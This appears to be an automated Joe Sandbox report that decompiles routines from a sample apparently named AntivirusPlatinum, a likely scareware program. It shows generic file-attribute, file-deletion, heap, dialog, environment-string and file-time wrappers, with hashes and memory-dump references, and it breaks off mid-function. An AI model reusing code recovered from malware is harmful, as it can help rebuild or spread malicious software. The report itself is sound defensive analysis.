                                                                                                                                                      0x0040576e
                                                                                                                                                      0x00405787
                                                                                                                                                      0x0040578b
                                                                                                                                                      0x00405770
                                                                                                                                                      0x00405770
                                                                                                                                                      0x00405776
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040577e
                                                                                                                                                      0x0040577f
                                                                                                                                                      0x0040577f
                                                                                                                                                      0x00405776
                                                                                                                                                      0x0040579b

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00404D18,00000045,?,?,?,?), ref: 0040577F
                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00404D18,00000045,?,?,?,?), ref: 0040578B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3849939888-0
                                                                                                                                                      • Opcode ID: 524b25f258809a36dfc35c36927b002a5b6a96657706656b02a112759786d9b7
                                                                                                                                                      • Instruction ID: 7e3c92b8c8380a4f5cb43efcc2c9e82e3b9f6ddc0792d840e2a2494f752396e4
                                                                                                                                                      • Opcode Fuzzy Hash: 524b25f258809a36dfc35c36927b002a5b6a96657706656b02a112759786d9b7
                                                                                                                                                      • Instruction Fuzzy Hash: 81D01234100601DBDB185B35CE8456F77A5EB01350F25853AA893E71E0D779CCA0FE29
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004057E8(void* __eflags, CHAR* _a4, WCHAR* _a8, long _a12) {
                                                                                                                                                      				signed int _t8;
                                                                                                                                                      				WCHAR* _t10;
                                                                                                                                                      
                                                                                                                                                      				if(E00406EA5() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t8 = SetFileAttributesA(_a4, _a12); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t10 = _a8;
                                                                                                                                                      					if(_t10 == 0 ||  *_t10 == 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t8 = SetFileAttributesW(_t10, _a12);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t8 & 0xffffff00 | _t8 != 0x00000000;
                                                                                                                                                      			}





                                                                                                                                                      0x004057ef
                                                                                                                                                      0x0040580c
                                                                                                                                                      0x00405814
                                                                                                                                                      0x004057f1
                                                                                                                                                      0x004057f1
                                                                                                                                                      0x004057f7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004057ff
                                                                                                                                                      0x00405804
                                                                                                                                                      0x00405804
                                                                                                                                                      0x004057f7
                                                                                                                                                      0x0040581f

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000400,004058DE,00000000,00000400,00000000,?,004059B4,00000400,00000002,00000001,00000000), ref: 00405804
                                                                                                                                                      • SetFileAttributesA.KERNELBASE(00000000,00000400,004058DE,00000000,00000400,00000000,?,004059B4,00000400,00000002,00000001,00000000), ref: 00405814
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3849939888-0
                                                                                                                                                      • Opcode ID: 12ca7f4e58392410de16856001fcee0e91b4b1d1f28ffb7e50594ca5539bfda5
                                                                                                                                                      • Instruction ID: 08685831cb82508d6e727d5ab8162a25905bf89111ec148f976887a7ede13977
                                                                                                                                                      • Opcode Fuzzy Hash: 12ca7f4e58392410de16856001fcee0e91b4b1d1f28ffb7e50594ca5539bfda5
                                                                                                                                                      • Instruction Fuzzy Hash: 1EE0EC36204601EADB556F21DE04A1FBBAAEF80350F04C43AB985E51F0D778CC70DB29
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405866(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                      				signed int _t6;
                                                                                                                                                      				WCHAR* _t8;
                                                                                                                                                      
                                                                                                                                                      				if(E00406EA5() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t6 = DeleteFileA(_a4); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t8 = _a8;
                                                                                                                                                      					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t6 = DeleteFileW(_t8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t6 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                      			}





                                                                                                                                                      0x0040586d
                                                                                                                                                      0x00405886
                                                                                                                                                      0x0040588a
                                                                                                                                                      0x0040586f
                                                                                                                                                      0x0040586f
                                                                                                                                                      0x00405875
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040587d
                                                                                                                                                      0x0040587e
                                                                                                                                                      0x0040587e
                                                                                                                                                      0x00405875
                                                                                                                                                      0x00405895

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                      • DeleteFileW.KERNEL32(?,00404FDA,-00000017,00000418,00000000,004054A2,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E), ref: 0040587E
                                                                                                                                                      • DeleteFileA.KERNELBASE(00000000,00404FDA,-00000017,00000418,00000000,004054A2,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E), ref: 0040588A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeleteFile$Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3886669992-0
                                                                                                                                                      • Opcode ID: cf6deccc3a9250c3054f7bca4c62ca8db216f1a25379af536149a02a497da06f
                                                                                                                                                      • Instruction ID: 716b7f0cb8a833341a7e27b2f494167b72d8bdc84a5c6d0c38cb64946278def0
                                                                                                                                                      • Opcode Fuzzy Hash: cf6deccc3a9250c3054f7bca4c62ca8db216f1a25379af536149a02a497da06f
                                                                                                                                                      • Instruction Fuzzy Hash: 8FD012315046019AD7147B22CE48A2B37A4EB50380B08C0366C05E11E0E778C870DA19
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A205(void* _a4) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      				char _t5;
                                                                                                                                                      
                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                      					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                      					return _t5;
                                                                                                                                                      				}
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      0x0040a20c
                                                                                                                                                      0x0040a21a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a21a
                                                                                                                                                      0x0040a221

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A213
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A21A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                      • Opcode ID: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                      • Instruction ID: ddbe3d2fe61905f89b57794dcc6228a96356cb271f48638cc85bb0a9df389cd0
                                                                                                                                                      • Opcode Fuzzy Hash: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                      • Instruction Fuzzy Hash: 62C01236004208ABCB101B90EA0CBDA3E69EB08302F008031B708841A0C6B596B0CBAE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040307F(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                                                                                                      				int _t6;
                                                                                                                                                      
                                                                                                                                                      				_t6 = EnableWindow(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}




                                                                                                                                                      0x00403094
                                                                                                                                                      0x0040309a

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040308D
                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00403094
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallbackDispatcherItemUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4250310104-0
                                                                                                                                                      • Opcode ID: 53d7fe0b17c9d7c83ce2a09200998b9300a9737409a95869f191deb72e36b247
                                                                                                                                                      • Instruction ID: a5b1e21e8c70e636ad4e3161602f3880b2a1687c4984bed245f76023c7c7062a
                                                                                                                                                      • Opcode Fuzzy Hash: 53d7fe0b17c9d7c83ce2a09200998b9300a9737409a95869f191deb72e36b247
                                                                                                                                                      • Instruction Fuzzy Hash: D1C04C76408241BFCB015BA09E08DAFBFA9EBD4311F00C959B1A5C0030C7B58461DB16
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E0040B613(void* __edi, void* __esi, intOrPtr* _a4, CHAR* _a8, char* _a12, char* _a16, char* _a20) {
                                                                                                                                                      				char _v4100;
                                                                                                                                                      				char* _t29;
                                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                                      				char _t32;
                                                                                                                                                      				char* _t34;
                                                                                                                                                      				char* _t45;
                                                                                                                                                      				char* _t47;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                      
                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                      				_t50 = __edi;
                                                                                                                                                      				E00401200(0x1000);
                                                                                                                                                      				_t29 = _a16;
                                                                                                                                                      				_t47 = _a20;
                                                                                                                                                      				if(_t29 != 0) {
                                                                                                                                                      					 *_t29 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t47 != 0) {
                                                                                                                                                      					 *_t47 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t30 = _a4;
                                                                                                                                                      				if(_t30 == 0) {
                                                                                                                                                      					L24:
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t32 =  *_t30;
                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                      						goto L24;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t51);
                                                                                                                                                      					_t52 = 0;
                                                                                                                                                      					_t48 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						_a4 = _a4 + 1;
                                                                                                                                                      						if(_t32 != 0x3d) {
                                                                                                                                                      							if(_t32 == 0xd) {
                                                                                                                                                      								_a4 = _a4 + 1;
                                                                                                                                                      								L20:
                                                                                                                                                      								 *_a8 = 0;
                                                                                                                                                      								_t34 = _a12;
                                                                                                                                                      								if(_t34 != 0) {
                                                                                                                                                      									 *_t34 = 0;
                                                                                                                                                      									if(_t52 != 0) {
                                                                                                                                                      										ExpandEnvironmentStringsA(_t52,  &_v4100, 0x1000);
                                                                                                                                                      										_t20 = _t50 - 1; // 0xfff
                                                                                                                                                      										E0040A4AB(_a12,  &_v4100, _t20);
                                                                                                                                                      										 *((char*)(_a12 + _t50 - 1)) = 0;
                                                                                                                                                      										 *_t52 = 0;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								return _a4;
                                                                                                                                                      							}
                                                                                                                                                      							if(_t32 == 0xa) {
                                                                                                                                                      								goto L20;
                                                                                                                                                      							}
                                                                                                                                                      							L15:
                                                                                                                                                      							_a8 =  &(_a8[1]);
                                                                                                                                                      							 *_a8 = _t32;
                                                                                                                                                      							_t12 = _t50 - 2; // 0xffe
                                                                                                                                                      							if(_t48 > _t12) {
                                                                                                                                                      								 *_a20 = 1;
                                                                                                                                                      								goto L20;
                                                                                                                                                      							}
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a12 == 0 || _t52 != 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t45 = _a16;
                                                                                                                                                      							if(_t45 != 0) {
                                                                                                                                                      								 *_t45 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							_t52 = _a8;
                                                                                                                                                      						}
                                                                                                                                                      						L16:
                                                                                                                                                      						_t32 =  *_a4;
                                                                                                                                                      						_t48 = _t48 + 1;
                                                                                                                                                      					} while (_t32 != 0);
                                                                                                                                                      					goto L20;
                                                                                                                                                      				}
                                                                                                                                                      			}














                                                                                                                                                      0x0040b613
                                                                                                                                                      0x0040b613
                                                                                                                                                      0x0040b61b
                                                                                                                                                      0x0040b620
                                                                                                                                                      0x0040b623
                                                                                                                                                      0x0040b62b
                                                                                                                                                      0x0040b62d
                                                                                                                                                      0x0040b62d
                                                                                                                                                      0x0040b631
                                                                                                                                                      0x0040b633
                                                                                                                                                      0x0040b633
                                                                                                                                                      0x0040b635
                                                                                                                                                      0x0040b63a
                                                                                                                                                      0x0040b6e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b640
                                                                                                                                                      0x0040b640
                                                                                                                                                      0x0040b644
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b64a
                                                                                                                                                      0x0040b64b
                                                                                                                                                      0x0040b64d
                                                                                                                                                      0x0040b64f
                                                                                                                                                      0x0040b64f
                                                                                                                                                      0x0040b654
                                                                                                                                                      0x0040b670
                                                                                                                                                      0x0040b699
                                                                                                                                                      0x0040b69c
                                                                                                                                                      0x0040b69f
                                                                                                                                                      0x0040b6a1
                                                                                                                                                      0x0040b6a6
                                                                                                                                                      0x0040b6a8
                                                                                                                                                      0x0040b6ac
                                                                                                                                                      0x0040b6bb
                                                                                                                                                      0x0040b6c1
                                                                                                                                                      0x0040b6cf
                                                                                                                                                      0x0040b6d7
                                                                                                                                                      0x0040b6db
                                                                                                                                                      0x0040b6db
                                                                                                                                                      0x0040b6ac
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b6e0
                                                                                                                                                      0x0040b674
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b676
                                                                                                                                                      0x0040b679
                                                                                                                                                      0x0040b67c
                                                                                                                                                      0x0040b67e
                                                                                                                                                      0x0040b683
                                                                                                                                                      0x0040b694
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b694
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b683
                                                                                                                                                      0x0040b659
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b65f
                                                                                                                                                      0x0040b65f
                                                                                                                                                      0x0040b664
                                                                                                                                                      0x0040b666
                                                                                                                                                      0x0040b666
                                                                                                                                                      0x0040b669
                                                                                                                                                      0x0040b669
                                                                                                                                                      0x0040b685
                                                                                                                                                      0x0040b688
                                                                                                                                                      0x0040b68a
                                                                                                                                                      0x0040b68b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b68f

                                                                                                                                                      APIs
                                                                                                                                                      • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFD4,00000000,?,?,?,?,?,?,0040D24D,?), ref: 0040B6BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 237503144-0
                                                                                                                                                      • Opcode ID: 5fae4e63873776018887329e3184201ecfcb9ea2296943329708b5b4d23760c0
                                                                                                                                                      • Instruction ID: 9e38d73e54712bb0db1db56ca4312cf1ed03176aaf8c23fdc66e675287b3661e
                                                                                                                                                      • Opcode Fuzzy Hash: 5fae4e63873776018887329e3184201ecfcb9ea2296943329708b5b4d23760c0
                                                                                                                                                      • Instruction Fuzzy Hash: 473175351441899FCB128E58C490AEE3BA4EB15340B444977F991AB391C37ADD85CBAF
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E004053C5(intOrPtr __ecx, intOrPtr* _a4, signed char _a7, intOrPtr* _a8, signed char _a11, intOrPtr* _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				int _t32;
                                                                                                                                                      				signed char _t40;
                                                                                                                                                      				intOrPtr* _t43;
                                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                                      				intOrPtr* _t53;
                                                                                                                                                      
                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                      				_t43 = _a4;
                                                                                                                                                      				if(_t43 == 0) {
                                                                                                                                                      					L2:
                                                                                                                                                      					_a7 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_a7 = 1;
                                                                                                                                                      					if( *_t43 == 0) {
                                                                                                                                                      						goto L2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t50 = _a8;
                                                                                                                                                      				if(_t50 == 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					_a11 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_a11 = 1;
                                                                                                                                                      					if( *_t50 == 0) {
                                                                                                                                                      						goto L5;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t53 = _a12;
                                                                                                                                                      				if(_t53 == 0 ||  *_t53 == 0) {
                                                                                                                                                      					_t40 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t40 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a7 != 0) {
                                                                                                                                                      					E0040DE21(_t43,  &_v16);
                                                                                                                                                      				}
                                                                                                                                                      				if(_a11 != 0) {
                                                                                                                                                      					E0040DE21(_t50,  &_v32);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t40 != 0) {
                                                                                                                                                      					E0040DE21(_t53,  &_v24);
                                                                                                                                                      				}
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				_t32 = SetFileTime( *(_v8 + 4),  ~(_a11 & 0x000000ff) &  &_v32,  ~(_t40 & 0x000000ff) &  &_v24,  ~(_a7 & 0x000000ff) &  &_v16); // executed
                                                                                                                                                      				return _t32;
                                                                                                                                                      			}












                                                                                                                                                      0x004053cb
                                                                                                                                                      0x004053ce
                                                                                                                                                      0x004053d5
                                                                                                                                                      0x004053df
                                                                                                                                                      0x004053df
                                                                                                                                                      0x004053d7
                                                                                                                                                      0x004053d7
                                                                                                                                                      0x004053dd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004053dd
                                                                                                                                                      0x004053e5
                                                                                                                                                      0x004053ea
                                                                                                                                                      0x004053f4
                                                                                                                                                      0x004053f4
                                                                                                                                                      0x004053ec
                                                                                                                                                      0x004053ec
                                                                                                                                                      0x004053f2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004053f2
                                                                                                                                                      0x004053f7
                                                                                                                                                      0x004053fc
                                                                                                                                                      0x00405406
                                                                                                                                                      0x00405402
                                                                                                                                                      0x00405402
                                                                                                                                                      0x00405402
                                                                                                                                                      0x0040540b
                                                                                                                                                      0x00405411
                                                                                                                                                      0x00405411
                                                                                                                                                      0x0040541a
                                                                                                                                                      0x00405422
                                                                                                                                                      0x00405422
                                                                                                                                                      0x00405429
                                                                                                                                                      0x00405431
                                                                                                                                                      0x00405431
                                                                                                                                                      0x0040543c
                                                                                                                                                      0x00405449
                                                                                                                                                      0x00405457
                                                                                                                                                      0x00405465
                                                                                                                                                      0x0040546f

                                                                                                                                                      APIs
                                                                                                                                                      • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00405465
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1425588814-0
                                                                                                                                                      • Opcode ID: f642364af0ceb2b33661677e8241ac08709fb3ff7d374f00a5f292b6e7a13f2b
                                                                                                                                                      • Instruction ID: b7019616bdd90384b6d06fdeb4558485ba74c302507b6c1e4955c3b22ac41809
                                                                                                                                                      • Opcode Fuzzy Hash: f642364af0ceb2b33661677e8241ac08709fb3ff7d374f00a5f292b6e7a13f2b
                                                                                                                                                      • Instruction Fuzzy Hash: B4219231500599AECF11DFB8C841AFF77A8DB11341B18807BE856EB2C1E678DB44DB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E0040928C(signed int __eax, intOrPtr* __ecx, void* __edx, void* __esi) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t65;
                                                                                                                                                      				CHAR* _t66;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      				char _t95;
                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				char _t111;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				void* _t117;
                                                                                                                                                      				void* _t118;
                                                                                                                                                      				void* _t119;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                      				signed int _t127;
                                                                                                                                                      
                                                                                                                                                      				_t110 = __edx;
                                                                                                                                                      				_t97 = __ecx;
                                                                                                                                                      				_t63 = __eax ^ _t127;
                                                                                                                                                      				if(_t63 >= 0) {
                                                                                                                                                      					 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                      					_push( *(_t127 + 8));
                                                                                                                                                      					_t125 = __ecx;
                                                                                                                                                      					_t65 = E0040A3AD();
                                                                                                                                                      					_t66 = _t127 - 0x40c;
                                                                                                                                                      					if(_t65 != 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						E0040A477(_t66,  *(_t127 + 8));
                                                                                                                                                      						E00404EC3(_t127 - 0x102c);
                                                                                                                                                      						_t70 = E00405097(_t127 - 0x102c, _t127 - 0x40c, 0, 1, 0); // executed
                                                                                                                                                      						if(_t70 != 0) {
                                                                                                                                                      							 *(_t127 + 8) =  *(_t127 + 8) | 0xffffffff;
                                                                                                                                                      							 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                                                                                      							_push(_t95);
                                                                                                                                                      							L8:
